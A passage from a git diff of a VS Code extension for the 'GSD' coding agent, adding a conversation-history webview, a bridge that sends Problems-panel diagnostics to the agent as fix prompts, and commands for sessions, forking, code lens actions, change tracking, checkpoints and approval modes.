+			color: var(--vscode-button-foreground);
+			background: var(--vscode-button-background);
+			white-space: nowrap;
+		}
+		.btn:hover { background: var(--vscode-button-hoverBackground); }
+		.count {
+			font-size: 12px;
+			opacity: 0.6;
+			white-space: nowrap;
+		}
+		.error {
+			color: var(--vscode-errorForeground);
+			padding: 10px 12px;
+			background: var(--vscode-inputValidation-errorBackground);
+			border-radius: 4px;
+			margin-bottom: 12px;
+		}
+		.empty {
+			opacity: 0.55;
+			font-style: italic;
+		}
+		.message {
+			margin-bottom: 14px;
+			border-radius: 5px;
+			overflow: hidden;
+			border: 1px solid var(--vscode-panel-border);
+		}
+		.message.hidden {
+			display: none;
+		}
+		.role-row {
+			display: flex;
+			align-items: center;
+			justify-content: space-between;
+			padding: 3px 10px;
+			background: var(--vscode-panel-border);
+		}
+		.message.assistant .role-row {
+			background: var(--vscode-focusBorder);
+		}
+		.role {
+			font-size: 10px;
+			font-weight: 700;
+			text-transform: uppercase;
+			letter-spacing: 0.6px;
+			opacity: 0.85;
+		}
+		.message.assistant .role {
+			color: var(--vscode-button-foreground);
+			opacity: 1;
+		}
+		.fork-btn {
+			padding: 1px 6px;
+			font-size: 10px;
+			border: 1px solid var(--vscode-foreground);
+			background: transparent;
+			color: var(--vscode-foreground);
+			border-radius: 3px;
+			cursor: pointer;
+			opacity: 0;
+			transition: opacity 0.15s;
+		}
+		.message:hover .fork-btn {
+			opacity: 0.6;
+		}
+		.fork-btn:hover {
+			opacity: 1 !important;
+			background: var(--vscode-button-secondaryBackground);
+		}
+		.content {
+			padding: 10px 12px;
+			white-space: pre-wrap;
+			word-break: break-word;
+			line-height: 1.55;
+		}
+		.tool-block {
+			margin: 8px 0;
+			padding: 6px 10px;
+			background: var(--vscode-editor-background);
+			border: 1px solid var(--vscode-panel-border);
+			border-radius: 4px;
+			font-size: 12px;
+		}
+		.tool-header {
+			display: flex;
+			align-items: center;
+			gap: 6px;
+			cursor: pointer;
+			user-select: none;
+			font-weight: 600;
+			opacity: 0.8;
+		}
+		.tool-header:hover {
+			opacity: 1;
+		}
+		.tool-body {
+			display: none;
+			margin-top: 6px;
+			padding-top: 6px;
+			border-top: 1px solid var(--vscode-panel-border);
+			white-space: pre-wrap;
+			word-break: break-all;
+			max-height: 200px;
+			overflow-y: auto;
+			opacity: 0.75;
+		}
+		.tool-block.expanded .tool-body {
+			display: block;
+		}
+		.thinking-block {
+			margin: 8px 0;
+			padding: 6px 10px;
+			background: var(--vscode-editor-background);
+			border-left: 3px solid var(--vscode-focusBorder);
+			border-radius: 2px;
+			font-size: 12px;
+			opacity: 0.65;
+			font-style: italic;
+		}
+		.thinking-header {
+			cursor: pointer;
+			user-select: none;
+			font-weight: 600;
+		}
+		.thinking-body {
+			display: none;
+			margin-top: 4px;
+			white-space: pre-wrap;
+			max-height: 300px;
+			overflow-y: auto;
+		}
+		.thinking-block.expanded .thinking-body {
+			display: block;
+		}
+		code {
+			background: var(--vscode-editor-background);
+			padding: 1px 4px;
+			border-radius: 3px;
+			font-family: var(--vscode-editor-font-family);
+			font-size: 0.92em;
+		}
+	</style>
+</head>
+<body>
+	<h2>Conversation History</h2>
+	<div class="toolbar">
+		<input type="text" class="search-input" id="search" placeholder="Search messages..." />
+		<button class="btn" id="refresh">Refresh</button>
+		${visibleMessages.length > 0 ? `<span class="count">${visibleMessages.length} message${visibleMessages.length === 1 ? "" : "s"}</span>` : ""}
+	</div>
+	${errorMessage ? `<div class="error">${escapeHtml(errorMessage)}</div>` : ""}
+	<div id="messages">
+		${!errorMessage && renderedMessages === "" ? '<div class="empty">No messages in this session.</div>' : renderedMessages}
+	</div>
+	<script nonce="${nonce}">
+		const vscode = acquireVsCodeApi();
+
+		document.getElementById('refresh').addEventListener('click', () => {
+			vscode.postMessage({ command: 'refresh' });
+		});
+
+		// Search filter
+		document.getElementById('search').addEventListener('input', (e) => {
+			const query = e.target.value.toLowerCase();
+			document.querySelectorAll('.message').forEach((el) => {
+				const text = el.textContent.toLowerCase();
+				el.classList.toggle('hidden', query && !text.includes(query));
+			});
+		});
+
+		// Toggle tool/thinking blocks
+		document.addEventListener('click', (e) => {
+			const header = e.target.closest('.tool-header, .thinking-header');
+			if (header) {
+				header.parentElement.classList.toggle('expanded');
+				return;
+			}
+			const forkBtn = e.target.closest('.fork-btn');
+			if (forkBtn) {
+				vscode.postMessage({ command: 'fork', entryId: forkBtn.dataset.entryId });
+			}
+		});
+	</script>
+</body>
+</html>`;
+	}
+}
+
+function renderContentBlocks(content: string | ContentBlock[]): string {
+	if (typeof content === "string") return escapeHtml(content);
+	if (!Array.isArray(content)) return "";
+
+	return content
+		.map((block) => {
+			if (typeof block === "string") return escapeHtml(block);
+
+			switch (block.type) {
+				case "text":
+					return escapeHtml(block.text ?? "");
+
+				case "thinking":
+					if (!block.text) return "";
+					return `<div class="thinking-block">
+						<div class="thinking-header">Thinking...</div>
+						<div class="thinking-body">${escapeHtml(block.text)}</div>
+					</div>`;
+
+				case "tool_use":
+					return `<div class="tool-block">
+						<div class="tool-header">Tool: ${escapeHtml(block.name ?? "unknown")}</div>
+						<div class="tool-body">${escapeHtml(JSON.stringify(block.input ?? {}, null, 2))}</div>
+					</div>`;
+
+				case "tool_result": {
+					const resultText = typeof block.content === "string"
+						? block.content
+						: Array.isArray(block.content)
+							? block.content.map((b) => (typeof b === "string" ? b : b?.text ?? "")).join("")
+							: "";
+					if (!resultText) return "";
+					const truncated = resultText.length > 500 ? resultText.slice(0, 500) + "..." : resultText;
+					return `<div class="tool-block">
+						<div class="tool-header">Tool Result</div>
+						<div class="tool-body">${escapeHtml(truncated)}</div>
+					</div>`;
+				}
+
+				default:
+					return "";
+			}
+		})
+		.join("");
+}
+
+function escapeHtml(text: string): string {
+	return text
+		.replace(/&/g, "&amp;")
+		.replace(/</g, "&lt;")
+		.replace(/>/g, "&gt;")
+		.replace(/"/g, "&quot;");
+}
+
+function getNonce(): string {
+	const chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
+	let nonce = "";
+	for (let i = 0; i < 32; i++) {
+		nonce += chars.charAt(Math.floor(Math.random() * chars.length));
+	}
+	return nonce;
+}
diff --git a/vscode-extension/src/diagnostics.ts b/vscode-extension/src/diagnostics.ts
new file mode 100644
index 000000000..cd25ccfee
--- /dev/null
+++ b/vscode-extension/src/diagnostics.ts
@@ -0,0 +1,142 @@
+import * as vscode from "vscode";
+import type { GsdClient } from "./gsd-client.js";
+
+/**
+ * Integrates with VS Code's diagnostic system:
+ * - Reads diagnostics (errors/warnings) from the Problems panel and sends them to the agent
+ * - Provides a DiagnosticCollection for the agent to surface its own findings
+ */
+export class GsdDiagnosticBridge implements vscode.Disposable {
+	private readonly collection: vscode.DiagnosticCollection;
+	private disposables: vscode.Disposable[] = [];
+
+	constructor(private readonly client: GsdClient) {
+		this.collection = vscode.languages.createDiagnosticCollection("gsd");
+		this.disposables.push(this.collection);
+	}
+
+	/**
+	 * Read all diagnostics for the active file and send them to the agent
+	 * as a "fix these problems" prompt.
+	 */
+	async fixProblemsInFile(): Promise<void> {
+		const editor = vscode.window.activeTextEditor;
+		if (!editor) {
+			vscode.window.showWarningMessage("No active file to fix.");
+			return;
+		}
+
+		const uri = editor.document.uri;
+		const diagnostics = vscode.languages.getDiagnostics(uri);
+
+		if (diagnostics.length === 0) {
+			vscode.window.showInformationMessage("No problems found in this file.");
+			return;
+		}
+
+		const fileName = vscode.workspace.asRelativePath(uri);
+		const problemText = formatDiagnostics(fileName, diagnostics);
+
+		const prompt = [
+			`Fix the following problems in \`${fileName}\`:`,
+			"",
+			problemText,
+			"",
+			"Fix all of these issues. Show me the changes.",
+		].join("\n");
+
+		await this.client.sendPrompt(prompt);
+	}
+
+	/**
+	 * Read all diagnostics across the workspace (errors only) and send
+	 * them to the agent as a "fix all errors" prompt.
+	 */
+	async fixAllProblems(): Promise<void> {
+		const allDiagnostics = vscode.languages.getDiagnostics();
+		const errorFiles: { fileName: string; diagnostics: vscode.Diagnostic[] }[] = [];
+
+		for (const [uri, diagnostics] of allDiagnostics) {
+			// Only include errors and warnings, skip hints/info
+			const significant = diagnostics.filter(
+				(d) => d.severity === vscode.DiagnosticSeverity.Error || d.severity === vscode.DiagnosticSeverity.Warning,
+			);
+			if (significant.length > 0) {
+				errorFiles.push({
+					fileName: vscode.workspace.asRelativePath(uri),
+					diagnostics: significant,
+				});
+			}
+		}
+
+		if (errorFiles.length === 0) {
+			vscode.window.showInformationMessage("No errors or warnings found in the workspace.");
+			return;
+		}
+
+		// Cap at 20 files to avoid overwhelming the agent
+		const capped = errorFiles.slice(0, 20);
+		const totalProblems = capped.reduce((sum, f) => sum + f.diagnostics.length, 0);
+
+		const sections = capped.map((f) => formatDiagnostics(f.fileName, f.diagnostics));
+
+		const prompt = [
+			`Fix the following ${totalProblems} problems across ${capped.length} file${capped.length > 1 ? "s" : ""}:`,
+			"",
+			...sections,
+			"",
+			"Fix all of these issues.",
+		].join("\n");
+
+		await this.client.sendPrompt(prompt);
+	}
+
+	/**
+	 * Add a GSD diagnostic (agent finding) to a file.
+	 * Can be used to surface agent review findings in the Problems panel.
+	 */
+	addFinding(
+		uri: vscode.Uri,
+		range: vscode.Range,
+		message: string,
+		severity: vscode.DiagnosticSeverity = vscode.DiagnosticSeverity.Warning,
+	): void {
+		const existing = this.collection.get(uri) ?? [];
+		const diagnostic = new vscode.Diagnostic(range, message, severity);
+		diagnostic.source = "GSD Agent";
+		this.collection.set(uri, [...existing, diagnostic]);
+	}
+
+	/** Clear all GSD diagnostics */
+	clearFindings(): void {
+		this.collection.clear();
+	}
+
+	dispose(): void {
+		for (const d of this.disposables) {
+			d.dispose();
+		}
+	}
+}
+
+function formatDiagnostics(fileName: string, diagnostics: vscode.Diagnostic[]): string {
+	const lines = [`**${fileName}**`];
+	for (const d of diagnostics) {
+		const severity = severityLabel(d.severity);
+		const line = d.range.start.line + 1;
+		const col = d.range.start.character + 1;
+		const source = d.source ? ` [${d.source}]` : "";
+		lines.push(`  - ${severity} (line ${line}:${col}): ${d.message}${source}`);
+	}
+	return lines.join("\n");
+}
+
+function severityLabel(severity: vscode.DiagnosticSeverity): string {
+	switch (severity) {
+		case vscode.DiagnosticSeverity.Error: return "Error";
+		case vscode.DiagnosticSeverity.Warning: return "Warning";
+		case vscode.DiagnosticSeverity.Information: return "Info";
+		case vscode.DiagnosticSeverity.Hint: return "Hint";
+		default: return "Unknown";
+	}
+}
diff --git a/vscode-extension/src/extension.ts b/vscode-extension/src/extension.ts
index ce89ab08e..f5e494240 100644
--- a/vscode-extension/src/extension.ts
+++ b/vscode-extension/src/extension.ts
@@ -2,9 +2,31 @@ import * as vscode from "vscode";
 import { GsdClient, ThinkingLevel } from "./gsd-client.js";
 import { registerChatParticipant } from "./chat-participant.js";
 import { GsdSidebarProvider } from "./sidebar.js";
+import { GsdFileDecorationProvider } from "./file-decorations.js";
+import { GsdBashTerminal } from "./bash-terminal.js";
+import { GsdSessionTreeProvider } from "./session-tree.js";
+import { GsdConversationHistoryPanel } from "./conversation-history.js";
+import { GsdSlashCompletionProvider } from "./slash-completion.js";
+import { GsdCodeLensProvider } from "./code-lens.js";
+import { GsdActivityFeedProvider } from "./activity-feed.js";
+import { GsdChangeTracker } from "./change-tracker.js";
+import { GsdScmProvider } from "./scm-provider.js";
+import { GsdDiagnosticBridge } from "./diagnostics.js";
+import { GsdLineDecorationManager } from "./line-decorations.js";
+import { GsdGitIntegration } from "./git-integration.js";
+import { GsdPermissionManager } from "./permissions.js";
 
 let client: GsdClient | undefined;
 let sidebarProvider: GsdSidebarProvider | undefined;
+let fileDecorations: GsdFileDecorationProvider | undefined;
+let sessionTreeProvider: GsdSessionTreeProvider | undefined;
+let activityFeedProvider: GsdActivityFeedProvider | undefined;
+let changeTracker: GsdChangeTracker | undefined;
+let scmProvider: GsdScmProvider | undefined;
+let diagnosticBridge: GsdDiagnosticBridge | undefined;
+let lineDecorations: GsdLineDecorationManager | undefined;
+let gitIntegration: GsdGitIntegration | undefined;
+let permissionManager: GsdPermissionManager | undefined;
 
 function requireConnected(): boolean {
 	if (!client?.isConnected) {
@@ -35,7 +57,43 @@ export function activate(context: vscode.ExtensionContext): void {
 		outputChannel.appendLine(`[stderr] ${msg}`);
 	});
 
-	client.onConnectionChange((connected) => {
+	// -- Persistent status bar item ----------------------------------------
+
+	const statusBarItem = vscode.window.createStatusBarItem(vscode.StatusBarAlignment.Left, 0);
+	statusBarItem.command = "workbench.view.extension.gsd";
+	statusBarItem.text = "$(hubot) GSD";
+	statusBarItem.tooltip = "GSD Agent — click to open";
+	statusBarItem.show();
+	context.subscriptions.push(statusBarItem);
+
+	async function refreshStatusBar(): Promise<void> {
+		if (!client?.isConnected) {
+			statusBarItem.text = "$(hubot) GSD";
+			statusBarItem.tooltip = "GSD: Disconnected";
+			return;
+		}
+		try {
+			const [state, stats] = await Promise.all([
+				client.getState().catch(() => null),
+				client.getSessionStats().catch(() => null),
+			]);
+			const modelId = state?.model?.id ?? "";
+			const costPart = stats?.totalCost !== undefined ? ` | $${stats.totalCost.toFixed(4)}` : "";
+			const streamPart = state?.isStreaming ? " $(sync~spin)" : "";
+			statusBarItem.text = `$(hubot) GSD${modelId ? ` | ${modelId}` : ""}${costPart}${streamPart}`;
+			statusBarItem.tooltip = state?.model
+				? `GSD: Connected — ${state.model.provider}/${state.model.id}`
+				: "GSD: Connected";
+		} catch {
+			// ignore fetch errors
+		}
+	}
+
+	const statusBarTimer = setInterval(() => refreshStatusBar(), 10_000);
+	context.subscriptions.push({ dispose: () => clearInterval(statusBarTimer) });
+
+	client.onConnectionChange(async (connected) => {
+		await refreshStatusBar();
 		if (connected) {
 			vscode.window.setStatusBarMessage("$(hubot) GSD connected", 3000);
 		} else {
@@ -53,10 +111,193 @@ export function activate(context: vscode.ExtensionContext): void {
 		),
 	);
 
+	// -- File decorations --------------------------------------------------
+
+	fileDecorations = new GsdFileDecorationProvider(client);
+	context.subscriptions.push(
+		fileDecorations,
+		vscode.window.registerFileDecorationProvider(fileDecorations),
+	);
+
+	// -- Bash terminal -----------------------------------------------------
+
+	const bashTerminal = new GsdBashTerminal(client);
+	context.subscriptions.push(bashTerminal);
+
+	// -- Session tree view -------------------------------------------------
+
+	sessionTreeProvider = new GsdSessionTreeProvider(client);
+	context.subscriptions.push(
+		sessionTreeProvider,
+		vscode.window.registerTreeDataProvider(GsdSessionTreeProvider.viewId, sessionTreeProvider),
+	);
+
+	// -- Activity feed -----------------------------------------------------
+
+	activityFeedProvider = new GsdActivityFeedProvider(client);
+	context.subscriptions.push(
+		activityFeedProvider,
+		vscode.window.registerTreeDataProvider(GsdActivityFeedProvider.viewId, activityFeedProvider),
+	);
+
+	// -- Change tracker & SCM provider -------------------------------------
+
+	changeTracker = new GsdChangeTracker(client);
+	context.subscriptions.push(changeTracker);
+
+	scmProvider = new GsdScmProvider(changeTracker, cwd);
+	context.subscriptions.push(scmProvider);
+
+	// -- Diagnostics -------------------------------------------------------
+
+	diagnosticBridge = new GsdDiagnosticBridge(client);
+	context.subscriptions.push(diagnosticBridge);
+
+	// -- Line-level decorations --------------------------------------------
+
+	lineDecorations = new GsdLineDecorationManager(changeTracker!);
+	context.subscriptions.push(lineDecorations);
+
+	// -- Git integration ---------------------------------------------------
+
+	gitIntegration = new GsdGitIntegration(changeTracker!, cwd);
+	context.subscriptions.push(gitIntegration);
+
+	// -- Permissions -------------------------------------------------------
+
+	permissionManager = new GsdPermissionManager(client);
+	context.subscriptions.push(permissionManager);
+
+	// -- Progress notifications --------------------------------------------
+
+	let currentProgress: { resolve: () => void } | undefined;
+
+	client.onEvent((evt) => {
+		const showProgress = vscode.workspace.getConfiguration("gsd").get<boolean>("showProgressNotifications", true);
+		if (!showProgress) return;
+
+		if (evt.type === "agent_start" && !currentProgress) {
+			vscode.window.withProgress(
+				{
+					location: vscode.ProgressLocation.Notification,
+					title: "GSD Agent",
+					cancellable: true,
+				},
+				(progress, token) => {
+					token.onCancellationRequested(() => {
+						client?.abort().catch(() => {});
+					});
+
+					// Listen for tool events to update progress message
+					const toolListener = client!.onEvent((toolEvt) => {
+						if (toolEvt.type === "tool_execution_start") {
+							const toolName = String(toolEvt.toolName ?? "");
+							progress.report({ message: `Running ${toolName}...` });
+						}
+					});
+
+					return new Promise<void>((resolve) => {
+						currentProgress = { resolve };
+						// Also clean up if disposed
+						token.onCancellationRequested(() => {
+							toolListener.dispose();
+							currentProgress = undefined;
+							resolve();
+						});
+					}).finally(() => {
+						toolListener.dispose();
+					});
+				},
+			);
+		} else if (evt.type === "agent_end" && currentProgress) {
+			currentProgress.resolve();
+			currentProgress = undefined;
+		}
+	});
+
+	// -- Context window warning --------------------------------------------
+
+	let lastContextWarning = 0;
+	client.onEvent(async (evt) => {
+		if (evt.type !== "message_end") return;
+		const showWarning = vscode.workspace.getConfiguration("gsd").get<boolean>("showContextWarning", true);
+		if (!showWarning) return;
+
+		// Throttle: at most once per 60 seconds
+		if (Date.now() - lastContextWarning < 60_000) return;
+
+		try {
+			const [state, stats] = await Promise.all([
+				client!.getState().catch(() => null),
+				client!.getSessionStats().catch(() => null),
+			]);
+			const contextWindow = state?.model?.contextWindow ?? 0;
+			const totalTokens = (stats?.inputTokens ?? 0) + (stats?.outputTokens ?? 0);
+			if (contextWindow <= 0) return;
+
+			const threshold = vscode.workspace.getConfiguration("gsd").get<number>("contextWarningThreshold", 80);
+			const pct = Math.round((totalTokens / contextWindow) * 100);
+			if (pct >= threshold) {
+				lastContextWarning = Date.now();
+				const action = await vscode.window.showWarningMessage(
+					`Context window ${pct}% full (${Math.round(totalTokens / 1000)}k / ${Math.round(contextWindow / 1000)}k). Consider compacting.`,
+					"Compact Now",
+				);
+				if (action === "Compact Now") {
+					await vscode.commands.executeCommand("gsd.compact");
+				}
+			}
+		} catch {
+			// ignore
+		}
+	});
+
 	// -- Chat participant ---------------------------------------------------
 
 	context.subscriptions.push(registerChatParticipant(context, client));
 
+	// -- Conversation history panel ----------------------------------------
+
+	// (panel is created on demand via gsd.showHistory command)
+
+	// -- Slash command completion ------------------------------------------
+
+	const slashCompletion = new GsdSlashCompletionProvider(client);
+	context.subscriptions.push(
+		slashCompletion,
+		vscode.languages.registerCompletionItemProvider(
+			[
+				{ language: "markdown" },
+				{ language: "plaintext" },
+				{ language: "typescript" },
+				{ language: "typescriptreact" },
+				{ language: "javascript" },
+				{ language: "javascriptreact" },
+			],
+			slashCompletion,
+			"/",
+		),
+	);
+
+	// -- Code lens "Ask GSD" -----------------------------------------------
+
+	const codeLensProvider = new GsdCodeLensProvider(client);
+	context.subscriptions.push(
+		codeLensProvider,
+		vscode.languages.registerCodeLensProvider(
+			[
+				{ language: "typescript" },
+				{ language: "typescriptreact" },
+				{ language: "javascript" },
+				{ language: "javascriptreact" },
+				{ language: "python" },
+				{ language: "go" },
+				{ language: "rust" },
+			],
+			codeLensProvider,
+		),
+	);
+
 	// -- Commands -----------------------------------------------------------
 
 	// Start
@@ -68,6 +309,7 @@ export function activate(context: vscode.ExtensionContext): void {
 				const autoCompaction = vscode.workspace.getConfiguration("gsd").get<boolean>("autoCompaction", true);
 				await client!.setAutoCompaction(autoCompaction).catch(() => {});
 				sidebarProvider?.refresh();
+				refreshStatusBar();
 				vscode.window.showInformationMessage("GSD agent started.");
 			} catch (err) {
 				handleError(err, "Failed to start GSD");
@@ -91,6 +333,8 @@ export function activate(context: vscode.ExtensionContext): void {
 			try {
 				await client!.newSession();
 				sidebarProvider?.refresh();
+				sessionTreeProvider?.refresh();
+				fileDecorations?.clear();
 				vscode.window.showInformationMessage("New GSD session started.");
 			} catch (err) {
 				handleError(err, "Failed to start new session");
@@ -344,6 +588,376 @@ export function activate(context: vscode.ExtensionContext): void {
 		}),
 	);
 
+	// Switch Session
+	context.subscriptions.push(
+		vscode.commands.registerCommand("gsd.switchSession", async (sessionFile?: string) => {
+			if (!requireConnected()) return;
+			const file = sessionFile ?? await (async () => {
+				const input = await vscode.window.showInputBox({
+					prompt: "Enter session file path",
+					placeHolder: "/path/to/session.jsonl",
+				});
+				return input;
+			})();
+			if (!file) return;
+			try {
+				await client!.switchSession(file);
+				sidebarProvider?.refresh();
+				sessionTreeProvider?.refresh();
+				vscode.window.showInformationMessage("Switched session.");
+			} catch (err) {
+				handleError(err, "Failed to switch session");
+			}
+		}),
+	);
+
+	// Refresh Sessions
+	context.subscriptions.push(
+		vscode.commands.registerCommand("gsd.refreshSessions", () => {
+			sessionTreeProvider?.refresh();
+		}),
+	);
+
+	// Show Conversation History
+	context.subscriptions.push(
+		vscode.commands.registerCommand("gsd.showHistory", () => {
+			if (!requireConnected()) return;
+			GsdConversationHistoryPanel.createOrShow(context.extensionUri, client!);
+		}),
+	);
+
+	// Ask About Symbol (triggered by code lens)
+	context.subscriptions.push(
+		vscode.commands.registerCommand(
+			"gsd.askAboutSymbol",
+			async (symbolName: string, fileName: string, lineNumber: number) => {
+				if (!requireConnected()) return;
+				try {
+					const prompt = `Explain the \`${symbolName}\` function/class in ${fileName} (line ${lineNumber}). Be concise.`;
+					await client!.sendPrompt(prompt);
+				} catch (err) {
+					handleError(err, "Failed to send Ask GSD request");
+				}
+			},
+		),
+	);
+
+	// Clear File Decorations
+	context.subscriptions.push(
+		vscode.commands.registerCommand("gsd.clearFileDecorations", () => {
+			fileDecorations?.clear();
+		}),
+	);
+
+	// Clear Activity Feed
+	context.subscriptions.push(
+		vscode.commands.registerCommand("gsd.clearActivity", () => {
+			activityFeedProvider?.clear();
+		}),
+	);
+
+	// Fork Session
+	context.subscriptions.push(
+		vscode.commands.registerCommand("gsd.forkSession", async () => {
+			if (!requireConnected()) return;
+			try {
+				const messages = await client!.getForkMessages();
+				if (messages.length === 0) {
+					vscode.window.showInformationMessage("No fork points available.");
+					return;
+				}
+				const items = messages.map((m) => ({
+					label: m.text.slice(0, 80) + (m.text.length > 80 ? "..." : ""),
+					description: m.entryId,
+					entryId: m.entryId,
+				}));
+				const selected = await vscode.window.showQuickPick(items, {
+					placeHolder: "Select a message to fork from",
+				});
+				if (!selected) return;
+				const result = await client!.forkSession(selected.entryId);
+				if (!result.cancelled) {
+					vscode.window.showInformationMessage("Session forked successfully.");
+					sidebarProvider?.refresh();
+					sessionTreeProvider?.refresh();
+				}
+			} catch (err) {
+				handleError(err, "Failed to fork session");
+			}
+		}),
+	);
+
+	// Toggle Steering Mode
+	context.subscriptions.push(
+		vscode.commands.registerCommand("gsd.toggleSteeringMode", async () => {
+			if (!requireConnected()) return;
+			try {
+				const state = await client!.getState();
+				const next = state.steeringMode === "all" ? "one-at-a-time" : "all";
+				await client!.setSteeringMode(next);
+				vscode.window.showInformationMessage(`Steering mode: ${next}`);
+				sidebarProvider?.refresh();
+			} catch (err) {
+				handleError(err, "Failed to toggle steering mode");
+			}
+		}),
+	);
+
+	// Toggle Follow-Up Mode
+	context.subscriptions.push(
+		vscode.commands.registerCommand("gsd.toggleFollowUpMode", async () => {
+			if (!requireConnected()) return;
+			try {
+				const state = await client!.getState();
+				const next = state.followUpMode === "all" ? "one-at-a-time" : "all";
+				await client!.setFollowUpMode(next);
+				vscode.window.showInformationMessage(`Follow-up mode: ${next}`);
+				sidebarProvider?.refresh();
+			} catch (err) {
+				handleError(err, "Failed to toggle follow-up mode");
+			}
+		}),
+	);
+
+	// Refactor Symbol (code lens)
+	context.subscriptions.push(
+		vscode.commands.registerCommand(
+			"gsd.refactorSymbol",
+			async (symbolName: string, fileName: string, lineNumber: number) => {
+				if (!requireConnected()) return;
+				try {
+					await client!.sendPrompt(`Refactor the \`${symbolName}\` function/class in ${fileName} (line ${lineNumber}). Improve clarity, performance, or structure while preserving behavior.`);
+				} catch (err) {
+					handleError(err, "Failed to send refactor request");
+				}
+			},
+		),
+	);
+
+	// Find Bugs in Symbol (code lens)
+	context.subscriptions.push(
+		vscode.commands.registerCommand(
+			"gsd.findBugsSymbol",
+			async (symbolName: string, fileName: string, lineNumber: number) => {
+				if (!requireConnected()) return;
+				try {
+					await client!.sendPrompt(`Review the \`${symbolName}\` function/class in ${fileName} (line ${lineNumber}) for potential bugs, edge cases, and issues.`);
+				} catch (err) {
+					handleError(err, "Failed to send bug review request");
+				}
+			},
+		),
+	);
+
+	// Generate Tests for Symbol (code lens)
+	context.subscriptions.push(
+		vscode.commands.registerCommand(
+			"gsd.generateTestsSymbol",
+			async (symbolName: string, fileName: string, lineNumber: number) => {
+				if (!requireConnected()) return;
+				try {
+					await client!.sendPrompt(`Generate comprehensive tests for the \`${symbolName}\` function/class in ${fileName} (line ${lineNumber}). Cover success paths, edge cases, and error scenarios.`);
+				} catch (err) {
+					handleError(err, "Failed to send test generation request");
+				}
+			},
+		),
+	);
+
+	// Toggle Auto-Retry
+	context.subscriptions.push(
+		vscode.commands.registerCommand("gsd.toggleAutoRetry", async () => {
+			if (!requireConnected()) return;
+			try {
+				const next = !client!.autoRetryEnabled;
+				await client!.setAutoRetry(next);
+				vscode.window.showInformationMessage(`Auto-retry ${next ? "enabled" : "disabled"}.`);
+				sidebarProvider?.refresh();
+			} catch (err) {
+				handleError(err, "Failed to toggle auto-retry");
+			}
+		}),
+	);
+
+	// Abort Retry
+	context.subscriptions.push(
+		vscode.commands.registerCommand("gsd.abortRetry", async () => {
+			if (!requireConnected()) return;
+			try {
+				await client!.abortRetry();
+				vscode.window.showInformationMessage("Retry aborted.");
+			} catch (err) {
+				handleError(err, "Failed to abort retry");
+			}
+		}),
+	);
+
+	// Set Session Name
+	context.subscriptions.push(
+		vscode.commands.registerCommand("gsd.setSessionName", async () => {
+			if (!requireConnected()) return;
+			const name = await vscode.window.showInputBox({
+				prompt: "Enter a name for this session",
+				placeHolder: "e.g. auth-refactor",
+			});
+			if (!name) return;
+			try {
+				await client!.setSessionName(name);
+				sidebarProvider?.refresh();
+				vscode.window.showInformationMessage(`Session named "${name}".`);
+			} catch (err) {
+				handleError(err, "Failed to set session name");
+			}
+		}),
+	);
+
+	// Copy Last Response
+	context.subscriptions.push(
+		vscode.commands.registerCommand("gsd.copyLastResponse", async () => {
+			if (!requireConnected()) return;
+			try {
+				const text = await client!.getLastAssistantText();
+				if (!text) {
+					vscode.window.showInformationMessage("No response to copy.");
+					return;
+				}
+				await vscode.env.clipboard.writeText(text);
+				vscode.window.showInformationMessage("Last response copied to clipboard.");
+			} catch (err) {
+				handleError(err, "Failed to copy last response");
+			}
+		}),
+	);
+
+	// -- SCM commands -------------------------------------------------------
+
+	context.subscriptions.push(
+		vscode.commands.registerCommand("gsd.acceptAllChanges", () => {
+			changeTracker?.acceptAll();
+			vscode.window.showInformationMessage("All agent changes accepted.");
+		}),
+	);
+
+	context.subscriptions.push(
+		vscode.commands.registerCommand("gsd.discardAllChanges", async () => {
+			if (!changeTracker?.hasChanges) {
+				vscode.window.showInformationMessage("No agent changes to discard.");
+				return;
+			}
+			const confirm = await vscode.window.showWarningMessage(
+				`Discard all agent changes (${changeTracker.modifiedFiles.length} files)?`,
+				{ modal: true },
+				"Discard",
+			);
+			if (confirm === "Discard") {
+				const count = await changeTracker.discardAll();
+				vscode.window.showInformationMessage(`Reverted ${count} file${count !== 1 ? "s" : ""}.`);
+			}
+		}),
+	);
+
+	context.subscriptions.push(
+		vscode.commands.registerCommand("gsd.discardFileChanges", async (resourceState: vscode.SourceControlResourceState) => {
+			if (!changeTracker || !resourceState?.resourceUri) return;
+			const filePath = resourceState.resourceUri.fsPath;
+			const success = await changeTracker.discardFile(filePath);
+			if (success) {
+				vscode.window.showInformationMessage(`Reverted ${vscode.workspace.asRelativePath(filePath)}`);
+			}
+		}),
+	);
+
+	context.subscriptions.push(
+		vscode.commands.registerCommand("gsd.acceptFileChanges", (resourceState: vscode.SourceControlResourceState) => {
+			if (!changeTracker || !resourceState?.resourceUri) return;
+			changeTracker.acceptFile(resourceState.resourceUri.fsPath);
+		}),
+	);
+
+	// -- Checkpoint commands ------------------------------------------------
+
+	context.subscriptions.push(
+		vscode.commands.registerCommand("gsd.restoreCheckpoint", async (checkpointId: number) => {
+			if (!changeTracker) return;
+			const checkpoint = changeTracker.checkpoints.find((c) => c.id === checkpointId);
+			if (!checkpoint) return;
+
+			const confirm = await vscode.window.showWarningMessage(
+				`Restore to "${checkpoint.label}"? This will revert files to their state at ${new Date(checkpoint.timestamp).toLocaleTimeString()}.`,
+				{ modal: true },
+				"Restore",
+			);
+			if (confirm === "Restore") {
+				const count = await changeTracker.restoreCheckpoint(checkpointId);
+				vscode.window.showInformationMessage(`Restored ${count} file${count !== 1 ? "s" : ""} to checkpoint.`);
+			}
+		}),
+	);
+
+	// -- Diagnostic commands ------------------------------------------------
+
+	context.subscriptions.push(
+		vscode.commands.registerCommand("gsd.fixProblemsInFile", async () => {
+			if (!requireConnected()) return;
+			try {
+				await diagnosticBridge!.fixProblemsInFile();
+			} catch (err) {
+				handleError(err, "Failed to fix problems");
+			}
+		}),
+	);
+
+	context.subscriptions.push(
+		vscode.commands.registerCommand("gsd.fixAllProblems", async () => {
+			if (!requireConnected()) return;
+			try {
+				await diagnosticBridge!.fixAllProblems();
+			} catch (err) {
+				handleError(err, "Failed to fix problems");
+			}
+		}),
+	);
+
+	context.subscriptions.push(
+		vscode.commands.registerCommand("gsd.clearDiagnostics", () => {
+			diagnosticBridge?.clearFindings();
+		}),
+	);
+
+	// -- Permission commands ------------------------------------------------
+
+	context.subscriptions.push(
+		vscode.commands.registerCommand("gsd.cycleApprovalMode", () => {
+			permissionManager?.cycleMode();
+		}),
+	);
+
+	context.subscriptions.push(
+		vscode.commands.registerCommand("gsd.selectApprovalMode", () => {
+			permissionManager?.selectMode();
+		}),
+	);
+
